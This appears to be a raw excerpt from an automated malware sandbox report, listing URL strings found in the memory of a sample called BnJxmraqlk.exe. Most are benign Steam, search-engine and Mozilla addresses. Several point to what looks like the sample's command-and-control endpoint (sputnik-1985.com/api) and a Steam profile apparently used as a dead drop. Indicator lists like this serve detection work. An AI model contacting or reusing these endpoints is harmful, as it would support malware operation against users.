                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstati
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co-
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.csF
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: BnJxmraqlk.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                    Source: BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/X
                    Source: BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000003.2266534657.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2339509497.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2304819049.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2267009156.0000000003C21000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2254231192.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2351060216.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295477766.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2266425241.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api298
                    Source: BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api:u
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apif
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apila
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apilaV
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/s&
                    Source: BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/s6
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/~
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
